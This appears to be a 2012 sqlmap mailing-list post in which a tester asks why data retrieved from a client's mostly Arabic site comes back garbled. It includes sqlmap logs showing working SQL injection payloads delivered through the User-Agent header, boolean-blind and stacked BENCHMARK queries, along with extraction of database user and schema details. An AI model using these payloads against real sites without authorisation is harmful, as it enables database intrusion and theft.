[sqlmap-users] problem with data retrieval

Sat, 02 Jun 2012 12:12:21 -0700 

I am doing a test right now and I am receiving unusual output during data
retrieval.  I have never seen this from sqlmap before.  I have tried using
single or multi threads, --no-cast, and --hex options with no luck.  I am
using sqlmap 1.0-dev r5100.  Could the data in the database be a different
language that sqlmap can't read?  The clinet's site is primarily in
arabic.  I need help!!  Thanks
*
Here is the output from the log file:*

Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)') AND 6574=6574--

    Type: stacked queries
    Title: MySQL < 5.0.12 stacked queries (heavy query)
    Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)'); SELECT
BENCHMARK(10000000,MD5(0x504b774c));--
---

current user:    None

current database:    None

current user is DBA:    None

sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: User-Agent
Parameter: User-Agent
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (Generic
comment)
    Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)') AND
6574=6574--

    Type: stacked queries
    Title: MySQL < 5.0.12 stacked queries (heavy query)
    Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)'); SELECT
BENCHMARK(10000000,MD5(0x504b774c));--
---

current user:    'x?'

current database:    None

current user is DBA:    None

sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: User-Agent
Parameter: User-Agent
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (Generic
comment)
    Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)') AND
6574=6574--

    Type: stacked queries
    Title: MySQL < 5.0.12 stacked queries (heavy query)
    Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)'); SELECT
BENCHMARK(10000000,MD5(0x504b774c));--
---

current user:    'x?'

current database:    '??nx^}h'

current user is DBA:    None


*Here is the command line output during testing:*

[13:37:28] [INFO] changes made by tampering scripts are not included in
shown payload content(s)
[13:37:28] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: Apache, ASP.NET 4.0.30319, ASP.NET, Microsoft
IIS 7.0

back-end DBMS: MySQL 5
[13:37:28] [INFO] fetching current user
[13:37:28] [INFO] retrieving the length of query output
[13:37:28] [INFO] retrieved:
[13:37:32] [INFO] resumed: x?
current user:    'x?'

[13:37:32] [INFO] fetching current database
[13:37:32] [INFO] retrieving the length of query output
[13:37:32] [INFO] retrieved: 8
[13:38:32] [INFO] retrieved: ??n  x^}h
current database:    '??nx^}h'

[13:38:32] [INFO] testing if current user is DBA
[13:38:32] [INFO] fetching current user
[13:38:32] [INFO] retrieving the length of query output
[13:38:32] [INFO] retrieved: 6
[13:38:58] [WARNING] there was a problem decoding value '??????' from
expected hexadecimal form

current user is DBA:    None

[13:38:58] [INFO] fetching database users
[13:38:58] [INFO] fetching number of database users
[13:38:58] [INFO] retrieved: 48
[13:39:08] [CRITICAL] unable to retrieve the number of database users
[13:39:08] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 23 times

[*] shutting down at 13:39:08

------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to